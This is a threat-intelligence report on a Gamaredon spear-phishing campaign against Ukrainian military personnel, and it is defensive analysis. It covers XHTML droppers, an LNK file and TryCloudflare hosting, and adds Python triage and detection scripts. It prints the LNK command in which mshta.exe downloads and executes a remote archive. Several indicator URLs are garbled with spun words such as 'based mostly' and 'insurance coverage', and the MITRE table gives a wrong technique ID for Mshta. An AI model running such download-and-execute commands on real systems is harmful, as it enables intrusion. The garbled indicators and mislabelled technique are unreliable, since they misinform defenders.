Key Takeaways
- Cyble Research and Intelligence Labs (CRIL) identified an active Gamaredon campaign targeting Ukrainian military personnel through spear-phishing emails.
- The emails carry malicious XHTML attachments which, when opened, execute obfuscated JavaScript that downloads a malicious archive to the victim’s system.
- This archive contains a Windows shortcut (LNK) file that, when triggered, initiates the execution of a remote .tar archive hosted on TryCloudflare[.]com via mshta.exe.
- The Threat Actors (TAs) leverage TryCloudflare’s one-time tunnel feature to anonymously host malicious files and access resources remotely without detection.
- The campaign appears to be large-scale and coordinated, as indicated by the widespread distribution of similar files, and it remains ongoing based on the volume and timing of discovered samples.
- The inclusion of a 1-pixel remote image suggests the TAs are tracking victim interactions with the malicious files, likely to monitor the campaign’s effectiveness.
Executive Summary
As the Russia-Ukraine conflict continues to evolve, we remain vigilant in monitoring emerging threats. Previously, we tracked the activities of UNC1151, which targeted Ukraine’s Ministry of Defence with a malicious Excel document designed to compromise sensitive systems. Additionally, we observed UAC-0184’s malware campaign, which deployed the XWORM RAT against Ukrainian targets, using Python to facilitate DLL sideloading techniques for further infiltration.
During our investigation, we came across an ongoing Gamaredon campaign targeting Ukraine. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-linked Advanced Persistent Threat (APT) group that has been active since at least 2013. It is known for its cyber-espionage activities, primarily targeting Ukrainian government institutions, the military, and other critical infrastructure sectors.
Gamaredon has been involved in numerous high-profile campaigns, notably during periods of heightened tension between Russia and Ukraine. Although its operations have been characterized by the use of relatively low-sophistication tools, its success is attributed to its persistence and focus on specific geopolitical targets.
In recent months, Gamaredon has intensified its efforts with a large-scale phishing campaign aimed at Ukrainian entities. This campaign involves sophisticated tactics and widespread phishing attempts, reflecting the ongoing and escalating nature of cyber threats amid the conflict. The figure below shows the Gamaredon samples observed since the start of August 2024.
Amid the ongoing Russia-Ukraine war, Cyble Research and Intelligence Labs (CRIL) encountered a spear-phishing campaign targeting Ukrainian military personnel. The malicious email contains an XHTML attachment that, upon opening, executes several malicious actions on the infected system. After thorough analysis, our research points to the Gamaredon APT group as the orchestrator of this attack.
Technical Details
The campaign begins with a spear-phishing email bearing the subject “ПОВІСТКА,” which translates to “summons.” The email is themed around a military summons directed at the recipient and includes a malicious XHTML attachment, as shown in the figure below.
Upon opening the XHTML file, the user is presented with a message in Ukrainian stating, “File uploaded to the ‘DOWNLOADS’ folder.” Simultaneously, a RAR compressed folder is silently dropped into the system’s Downloads directory. This action is designed to mislead the victim, making it appear as if a legitimate file has been downloaded. The figure below shows the XHTML message.
The XHTML file contains obfuscated JavaScript code that executes when the user opens the file. In the XHTML, the JavaScript is embedded within a `div` element, with the `div id` set to “jwu.” This obfuscated script consists of a Base64-encoded string mixed with a “*” character at random positions to evade detection. The JavaScript execution is triggered via the “onerror” event. In some variants, it is activated by the “onmousemove” event, ensuring the malicious code runs as soon as the user interacts with the file. The figure below shows the obfuscated XHTML code.
The de-obfuscated string within the “jwu” `div` reveals JavaScript code that contains a Base64-encoded 7zip compressed archive disguised with a .rar file extension. This script decodes the Base64 data and saves the 7zip archive to the Downloads folder as “5-2839-2024_29.08.2024.rar.” Additionally, the script retrieves a 1-pixel remote image, likely serving as a tracking mechanism to monitor the execution of and interaction with the malicious file. The figure below shows the de-obfuscated JavaScript.
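As an added, illustrative triage example (not code from the original report or from Cyble), the following Python script applies the structure described above to a constructed XHTML fragment: it locates `div` elements whose text is Base64 sprinkled with “*” characters, strips the noise, decodes the blob, and identifies the real archive format from its magic bytes rather than trusting the extension the dropper assigns. The `div` id, the event handler names and the noise character come from the report; the sample document, the embedded bytes (only a 7-Zip signature plus inert filler) and all function names are assumptions made for this example.

```python
import base64
import binascii
import re

# Archive signatures used to identify the decoded payload regardless of its extension.
SEVEN_ZIP_MAGIC = b"\x37\x7a\xbc\xaf\x27\x1c"   # "7z\xBC\xAF\x27\x1C"
RAR_MAGIC = b"Rar!\x1a\x07"                      # common prefix of RAR4 and RAR5 headers


def _make_sample_xhtml():
    """Build a constructed XHTML sample shaped like the report's description (not a real attachment)."""
    payload = SEVEN_ZIP_MAGIC + b"\x00\x04" + b"X" * 40      # 7-Zip signature plus inert filler
    b64 = base64.b64encode(payload).decode()
    # '*' noise inserted at arbitrary positions, as the report describes
    noisy = b64[:5] + "*" + b64[5:17] + "**" + b64[17:40] + "*" + b64[40:]
    return ('<html><body><div id="jwu">' + noisy + '</div>'
            '<img src="x" onerror="run()"/></body></html>')


SAMPLE_XHTML = _make_sample_xhtml()   # constructed sample input

DIV_RE = re.compile(r'<div\s+id="([^"]+)"[^>]*>(.*?)</div>', re.S)
B64_WITH_NOISE = re.compile(r'^[A-Za-z0-9+/=*\s]+$')
TRIGGER_RE = re.compile(r'\b(onerror|onmousemove)\s*=', re.I)


def extract_candidate_blobs(xhtml):
    """Return (div_id, cleaned_base64) for divs whose text is Base64 with '*' noise mixed in."""
    found = []
    for div_id, body in DIV_RE.findall(xhtml):
        text = body.strip()
        if len(text) >= 32 and "*" in text and B64_WITH_NOISE.match(text):
            found.append((div_id, re.sub(r"[*\s]", "", text)))
    return found


def identify_payload(data):
    """Name the archive format by magic bytes; the extension chosen by the script is not trusted."""
    if data.startswith(SEVEN_ZIP_MAGIC):
        return "7z"
    if data.startswith(RAR_MAGIC):
        return "rar"
    return "unknown"


def triage(xhtml):
    """Decode each candidate blob and report its real format, size and the event handlers that fire it."""
    triggers = sorted({t.lower() for t in TRIGGER_RE.findall(xhtml)})
    findings = []
    for div_id, cleaned in extract_candidate_blobs(xhtml):
        try:
            raw = base64.b64decode(cleaned, validate=True)
        except binascii.Error:
            continue   # not Base64 once the noise is stripped; skip it
        findings.append({"div_id": div_id, "format": identify_payload(raw),
                         "size": len(raw), "triggers": triggers})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_XHTML):
        print(f"div#{f['div_id']}: {f['format']} archive, {f['size']} bytes, fired by {f['triggers']}")
```

Run against the constructed sample, the script reports a 7z archive inside `div#jwu` fired by `onerror`, which is the mismatch the report points out: the dropper writes the file with a .rar name, but the bytes are 7-Zip. Checking magic bytes rather than extensions is the useful habit here, both for sandbox triage and for mail-gateway rules that key on embedded archives.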
The RAR file contains a Windows shortcut (LNK) file. Upon execution, the malicious LNK file triggers the execution of the remote .tar file via mshta.exe. In this campaign, the TAs leveraged the domain trycloudflare[.]com to host the malicious tar archives. By abusing the TryCloudflare service, TAs can establish a one-time tunnel without needing a Cloudflare account. This tunnel enables remote access to resources and data outside the local network, functioning similarly to a VPN or Secure Shell (SSH) protocol, allowing the attackers to evade traditional detection mechanisms.
The Target command of the LNK file is shown below.
- “C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/teacher.tar /f”
The figure below shows the properties of the LNK file.
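An added example, not from the original report, of the process-creation detection that the LNK target above calls for: it scans constructed Sysmon-style events for mshta.exe launched with a remote URL, raises the severity when the host is a *.trycloudflare.com quick tunnel, and notes when the fetched path carries an archive extension while being executed as HTA content. The event field names follow Sysmon Event ID 1 conventions; the tunnel hostname, local paths and function names are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed Sysmon-style (Event ID 1) process-creation events; not real telemetry.
# The TryCloudflare hostname is a placeholder modelled on the pattern in the report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"C:\Windows\System32\mshta.exe https://placeholder-tunnel-name.trycloudflare.com/tcg/instruct/teacher.tar /f"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\ProgramData\Vendor\setup.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": r"mshta.exe https://intranet.example.internal/tools/report.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

URL_RE = re.compile(r'https?://[^\s"\']+', re.I)
ARCHIVE_EXT = (".tar", ".rar", ".7z", ".zip")


def classify_event(event):
    """Return an alert dict for a suspicious mshta.exe launch, or None for anything else."""
    image = event.get("Image", "")
    if image.lower().rsplit("\\", 1)[-1] != "mshta.exe":
        return None
    urls = URL_RE.findall(event.get("CommandLine", ""))
    if not urls:
        return None   # local HTA file: worth baselining, but not this campaign's pattern
    reasons = ["mshta.exe launched with a remote URL (Mshta proxy execution)"]
    severity = "high"
    for url in urls:
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        path = parsed.path.lower()
        if host.endswith(".trycloudflare.com"):
            reasons.append(f"{host} is a TryCloudflare quick tunnel (no account needed, short-lived)")
            severity = "critical"
        if path.endswith(ARCHIVE_EXT):
            reasons.append(f"remote path {path} has an archive extension but is executed as HTA content")
    return {"severity": severity, "image": image,
            "parent": event.get("ParentImage", ""), "urls": urls, "reasons": reasons}


def scan(events):
    """Apply classify_event to every event and keep only the alerts."""
    return [alert for alert in map(classify_event, events) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["image"], "<-", alert["parent"])
        for reason in alert["reasons"]:
            print("   -", reason)
```

On the constructed events the first entry is rated critical on all three counts, the intranet HTA is flagged high for review, and the local HTA and the PowerShell launch produce nothing. Keying on the trycloudflare.com suffix matters because each quick tunnel gets a fresh random subdomain, so blocking individual hostnames from an IoC list will always lag the campaign.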
We were unable to obtain the .tar files in our research. However, according to an analysis by Cisco Talos, Gamaredon is known for downloading additional malicious files designed to steal sensitive information from the victim’s system.
Conclusion
The ongoing Gamaredon APT campaign demonstrates the group’s persistence and evolving tactics in targeting Ukrainian military personnel. By leveraging spear-phishing emails, malicious XHTML attachments, and obfuscated JavaScript, the attackers deliver harmful payloads while exploiting TryCloudflare’s one-time tunnel feature to host malicious archives. The campaign’s scale and frequency indicate a coordinated, mass phishing effort aimed at sensitive Ukrainian entities.
Recommendations
The following are the recommendations to mitigate the Gamaredon APT campaign.
- Train users to recognize spear-phishing attempts, especially those with suspicious attachments or unexpected military-themed content.
- Implement email security solutions with advanced threat protection that filter phishing emails and malicious attachments.
- Deploy anti-malware solutions capable of detecting and blocking obfuscated JavaScript and malicious LNK files.
- Monitor for unusual network activity, including connections to TryCloudflare tunnels and other unknown external resources.
- Use application whitelisting to allow only trusted applications and scripts to run.
- Leverage threat intelligence platforms to block known malicious domains, including those abusing TryCloudflare.
MITRE ATT&CK® Techniques
Tactic | Technique | Procedure |
--- | --- | --- |
Initial Access (TA0001) | Phishing: Spearphishing Attachment (T1566.001) | Gamaredon sends spear-phishing emails with malicious XHTML attachments targeting Ukrainian military personnel. |
Execution (TA0002) | User Execution: Malicious File (T1204.002) | The campaign relies on users opening the XHTML attachment, which then triggers JavaScript code execution. |
Execution (TA0002) | Signed Binary Proxy Execution: Mshta (T1053.005) | mshta.exe is used to execute a remote .tar archive file hosted on a compromised cloud service. |
Defence Evasion (TA0005) | Obfuscated Files or Information (T1027) | The campaign uses obfuscated JavaScript hidden in the XHTML file, including random “*” characters in Base64-encoded strings to avoid detection. |
Indicators of Compromise
Indicator | Indicator Type | Description |
--- | --- | --- |
0c823adb18cf2583222e6fbe73c08cac8147d20b02fbe88d51cac2a1c628a30b | SHA256 | XHTML |
12bac5853724722330ce7f6b782db13844f8343ccc851fa2db1e93b980a6cf49 | SHA256 | XHTML |
a4806713db9cf41ab503e046981b8c5e1a9928314bb32545bd104fab2c36b332 | SHA256 | XHTML |
0fd6e081172d8576ad2f16ab6360a0086442560aa24ab1f4636a592f279c19ef | SHA256 | XHTML |
66de05ae4f4f185a514ad11daac0b7f944748ffa6885a7d7a826def45d305cfe | SHA256 | XHTML |
1a6ce74fc1487537936d769243f39b265fd3911e72e7caacaa793f1fffe52296 | SHA256 | XHTML |
e6d342fde640e5d5d9ef2f470d0f23ed660d7f19cc33470ec40a9f8e9b9c1561 | SHA256 | XHTML |
17f66f2b3e2f9ba8c8f739876f99e2d7abc81b264f3015d3de86267f007cc49b | SHA256 | XHTML |
10cecb7a032325024b9ba7a0ea5f1a910268078317ca4ca7dae9e06779837631 | SHA256 | XHTML |
83d4b0aea975acb7f80417748f179d8ef9ecbba9150b24e3354ef92e17ccf242 | SHA256 | XHTML |
201ad0967246bb0a5b3f7aa85f31395e750c0237959d86b9c2d9dbf5fbb951c4 | SHA256 | XHTML |
d4df2899a4569f7cb9ac5edce6b4eef8eba3031b7f96f74552734362afea18b7 | SHA256 | XHTML |
95beb4bd1a94c8db58dddeb926f656003e1dca2c66d04870380445b23840b536 | SHA256 | XHTML |
13f065a592246074d7d929dd4f977d247a69efa9e1dbbe3613f81d3d8f39d6f4 | SHA256 | XHTML |
a1d689a0839a143e371242fb217db82e0cbdfeff4daa49e6ffe5c5b3375fae3d | SHA256 | XHTML |
4b1d8e58c866a8b12e8987559287592ee54a482328e8c03d5666a761bcf10f92 | SHA256 | XHTML |
db63ca233296a239e4b8d7f28b2db776596bcb645d3958bc4b3447074d7635b9 | SHA256 | XHTML |
2da9941aae860aaa2d3bb7208c900549464955733457f529014d945a24737e79 | SHA256 | XHTML |
2636907826c9bc27ee4c7519979c0add5ad981e71edf7eb53002b8ab89fc8142 | SHA256 | XHTML |
e18955f5a9fb6abb30fd5dcbc840d34cce9bb1c70552cc36941139fc6e7304b5 | SHA256 | XHTML |
0ae813d5ea1c0114795174a48b57a90c0f719485e3c733bbd5403c77dab29298 | SHA256 | XHTML |
71e02cfc2c871768b8ae5ad9af9e9cb664e0a66be3f3c8d050b6d58f3cd4c07a | SHA256 | XHTML |
ad2c0c8d14d782610ed7173a5d0b4bd13524ceb1027d070a1cda312cfd60983a | SHA256 | XHTML |
1cbd7696840ec6a3442a8bf4f7deb545bbeeee68fb27e4352197953af976cf2a | SHA256 | XHTML |
0a4bcecdee823cc3c2d4ae2d5569edca7bc8372f5d37f62083782e92732a63c8 | SHA256 | XHTML |
afa7a8bb0cb0508f579b936488bbfff0142d458c26ef98904cb06e98f6b50f81 | SHA256 | XHTML |
265042be55ec0082a500a24cdb5da8b289c42116e23eddcfc80dfd24019f6412 | SHA256 | XHTML |
1b3db58482ad147faeda64eced7648bee08bfc78194e3f7bcb52cf1860d07a04 | SHA256 | XHTML |
821ee2a91cca1e17f890e099ee41a47cc5943149a10e81467e57803d6d5b02de | SHA256 | XHTML |
0e1eb8a5f850bc7712f78adcfe6c7c29215ea620ad2c36a0795016f0299d6ea4 | SHA256 | XHTML |
f9662c14db97db311d71b00ce33a41bbc4bc4ab6f05d8ccd99562e773d8948b1 | SHA256 | XHTML |
c7802521935c6dc3dc81e15ac952b9782ca1743dcd9e4e11030f0957d8f2a156 | SHA256 | XHTML |
56188e68f6f6bba34f6771056859f1a7232edef264fbe67e0c8b30c1ca569259 | SHA256 | XHTML |
a620f9af481001e2d96a2d210f086fa144731a1b95db32addcd148e09a627374 | SHA256 | XHTML |
df124b73f309e634ca7c226c5e1ae2545f45907a88a40249c8ac1d5e40eca43f | SHA256 | XHTML |
f94817a02884f73f9ed462c67581cda4fc169568f7636f01237a25da3df93d7c | SHA256 | XHTML |
5f7173cd548b227206e70419739a2f6ca4087ef693297b9b67a29fbcb4d1e928 | SHA256 | XHTML |
f59715593679ff13e92e14f8f98c6ead1cbe678f3a5ac28de8085c1a7132b02c | SHA256 | XHTML |
58d6c125ccab32414f63ba62cc7ba4a2500a0d2890506069ba7e0ac166799491 | SHA256 | XHTML |
51427e20fc02cb04948c2ab53378beb52727a6a84570f880aeaebd6be27f1dad | SHA256 | XHTML |
bbc97c086436385c32b0ac5f6cf35e7446f0e12e0412ed090e7099b873837795 | SHA256 | XHTML |
a7d060ea2dfd98f723aff909e5c88c3d8d3d54d96e5f6e7a09aad1de8d8ef10b | SHA256 | XHTML |
cba52f16695dc3d80a98c560a7614a3f91aaea242344b423b260d06362a2c9e0 | SHA256 | XHTML |
ab333d21c0fa8fe5b6cd620736fb04d7af53a6a0be604066617a1374fa7baa78 | SHA256 | XHTML |
a4b912413e39b4307613c8941af258750782e77d820c172155dfaaee6b32d2db | SHA256 | XHTML |
c863155cf6a39a376eef232737ba2922e324d8b05de36ddebe4068060b09a498 | SHA256 | XHTML |
bee43c5f1a714fdef911e5dc99fe27854f5db00de859dddc09e720eb56e1c53e | SHA256 | XHTML |
ca7a5daf2528233dae5c38d929a07ef30d5ca7d349df2ce842d795311f22fa2f | SHA256 | XHTML |
770223d8c0c7d5abd4d6c0215cf9479f7a0e32a1dfaaa3b42c71dfe26ccb986f | SHA256 | XHTML |
dacb0c04579116f6245ca0ee69a5d328c3f23e5d0c5f579133070fe0f06659d1 | SHA256 | XHTML |
0a06f536d08150ce6ea521a563fd321229b9e044ce993f9a667336a34d838b3f | SHA256 | XHTML |
57dd02447cf705fe570ed6b3051f3bff06e8506360ba667e02731332d04eb37c | SHA256 | XHTML |
0e0ce820f8b5deae3755ed372a0b898861a4cc7cb70cfd90197452773b078452 | SHA256 | XHTML |
dbdff73a7a6e6eae23c8cd5093b3df11f39cddf86e48b651e68c329df59ee0e8 | SHA256 | XHTML |
c32f28fc87f8efcd3f9c044f1898f3e712d4b4802c99df1525644ebfb3df2f2d | SHA256 | XHTML |
e867ce12e119eebe53de1acccd99fca09a9802d1432d31dafaf5d76b8a87f099 | SHA256 | XHTML |
92ee588be70e23ca459627ae22f05fba11589eeaeed0f8dd153416d952bb57e0 | SHA256 | XHTML |
1ab3b99af98b7d9fb13d5b6acfc1bf3f4aa2a751bea58ba060f386509ccc73d3 | SHA256 | XHTML |
b8f91aae00889eda914ef72b99688e920e113fb3723607250d2a1c949effaac3 | SHA256 | XHTML |
b95eea2bee2113b7b5c7af2acf6c6cbde05829fab79ba86694603d4c1f33fdda | SHA256 | XHTML |
7525cd06447204ce72e5d24eb1e96c142d72f9f8f5339d61b6151f430bda2dae | SHA256 | XHTML |
be801d78c112fae7a1cec1d20e1f2a85f28987d15c825c1773860bc7e99c5e87 | SHA256 | XHTML |
de2f0a2aafacfee9d7989cdafd0617211a44d320b0fba6c488f480d92dab0891 | SHA256 | XHTML |
66d30cc00a2445c5527049875e43c2c85a8995a0983502cd5e0276235bab8040 | SHA256 | XHTML |
450badddfae09a3eedb613e59f9a18d69632ee28d5e59e52c6d4bae151225f87 | SHA256 | XHTML |
d55a4a4596908abc5742f43e9b44b23951935feead10de52f3916ac5fd811a80 | SHA256 | XHTML |
7cdf0df1284b75a7d4e945d1d6a707c65e3527ae38aea7c9d82163c019c8203c | SHA256 | XHTML |
37c7adb7a719ec99c54b86faad0a2e5164599f0b85ecbc07683b89da0355c655 | SHA256 | XHTML |
efceb2cb0d0a332a630c04a8bce6f0e5dedd297ce7c0943f3783ee0749342ef3 | SHA256 | XHTML |
ce040948011f0ccc9309ab2cb08c7a80bf0337415818cf916e6e2e7ed70ed49e | SHA256 | XHTML |
5938c03b725f37f68ebf950edf4fd5688900e273ee0a55c305ff4fd9995d03b1 | SHA256 | XHTML |
112bd0f71522e05c21ad249a20534fb8d3306a73f5c39dd44bfb9e198a96e9f8 | SHA256 | XHTML |
cbfe9331e8a1b36f8e5be68f6588a6a116dfd63b474fcac618bc75854535e699 | SHA256 | XHTML |
c449c4be65021a4563da97ae4f150bed4f388236031d33e17953b7d6666381e1 | SHA256 | XHTML |
6c1e4a444e40b27db722be2321eb1c69455251940b30f0e2232103015b7af3cc | SHA256 | XHTML |
11b0f2bbb811f42dd463c247401fddd9c2efb2708b9be142573597ee869da29a | SHA256 | XHTML |
7c2bbaaa90b7f66b9ccfb3136905e8d07d8c8f1542aa605844319992a39133c9 | SHA256 | XHTML |
982dac7a43329d6e204e74d87d60c08e94ba3a46ccf36445b218b86f05e44a90 | SHA256 | XHTML |
5a70f39a3d87469146b0a8a92086675dc15e483aa412a0a9aa5dc9809bf8f22f | SHA256 | XHTML |
663c6f08b3aedb4323e0f73cab526ddcc1f6de53ea7084712940c1cb54d75ab0 | SHA256 | XHTML |
hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/preservation/chosen[.]rar | URL | Malicious URL |
hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/seeing/prayers[.]rar | URL | Malicious URL |
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/common/presence[.]tar | URL | Malicious URL |
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/previous/baron[.]tar | URL | Malicious URL |
hxxps://tracked–radar-ni[.]trycloudflare[.]com/zgur/sensation/gravestone[.]rar | URL | Malicious URL |
hxxps://cod-identification-imported-carl[.]trycloudflare[.]com/f/precaution[.]rtf | URL | Malicious URL |
hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/senior/refuge[.]tar | URL | Malicious URL |
hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/gss/quest/presents[.]tar | URL | Malicious URL |
hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/determine/barn[.]tar | URL | Malicious URL |
hxxps://molecular-throw-process-dealtime[.]trycloudflare[.]com/gss/quietly/vendor[.]tar | URL | Malicious URL |
hxxps://tracked–radar-ni[.]trycloudflare[.]com/zgur/questions/preponderant[.]rar | URL | Malicious URL |
hxxps://tracked–radar-ni[.]trycloudflare[.]com/psvr/decay/barefooted[.]rar | URL | Malicious URL |
hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/psvr/rejoined/web[.]rar | URL | Malicious URL |
hxxps://sunrise-massive-joseph-commodities[.]trycloudflare[.]com/zsvr/sentiment/banisters[.]rar | URL | Malicious URL |
hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/development/days[.]tar | URL | Malicious URL |
hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/consumption/discount[.]tar | URL | Malicious URL |
hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/discount/barton[.]tar | URL | Malicious URL |
hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcul/based mostly/guarded[.]tar | URL | Malicious URL |
hxxps://tracked–radar-ni[.]trycloudflare[.]com/sudu/inadequate/impartial[.]rar | URL | Malicious URL |
hxxps://tracked–radar-ni[.]trycloudflare[.]com/sudu/determine/quest[.]rar | URL | Malicious URL |
hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vo/nervous/bar[.]tar | URL | Malicious URL |
hxxps://bush-worcester-houses-statements[.]trycloudflare[.]com/sudu/headlong/headache[.]rar | URL | Malicious URL |
hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/misplaced/web[.]tar | URL | Malicious URL |
hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vomr/regards/bananas[.]tar | URL | Malicious URL |
hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vg/calm down/shortly[.]tar | URL | Malicious URL |
hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/preparations/sequel[.]tar | URL | Malicious URL |
hxxps://charter-blond-desired-promptly[.]trycloudflare[.]com/gmm/base/assure[.]tar | URL | Malicious URL |
hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/heap/September[.]tar | URL | Malicious URL |
hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/develop/precaution[.]tar | URL | Malicious URL |
hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcg/instruct/teacher[.]tar | URL | Malicious URL |
hxxps://axxribute-homework-generator-lovers[.]trycloudflare[.]com/onp/decent2/first rate[.]tar | URL | Malicious URL |
hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcu/headphones/bananas[.]tar | URL | Malicious URL |
hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/insurance coverage/predicate[.]tar | URL | Malicious URL |
hxxps://mind-apple-slightly-twiki[.]trycloudflare[.]com/ug/daytime2/daytime[.]tar | URL | Malicious URL |
hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/fast/prediction[.]tar | URL | Malicious URL |
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/seeming/quay[.]tar | URL | Malicious URL |
hxxps://longitude-powerpoint-geek-upgrade[.]trycloudflare[.]com/sg/precision2/precision[.]tar | URL | Malicious URL |
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/areas/headmaster[.]tar | URL | Malicious URL |
The post Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Military appeared first on Cyble.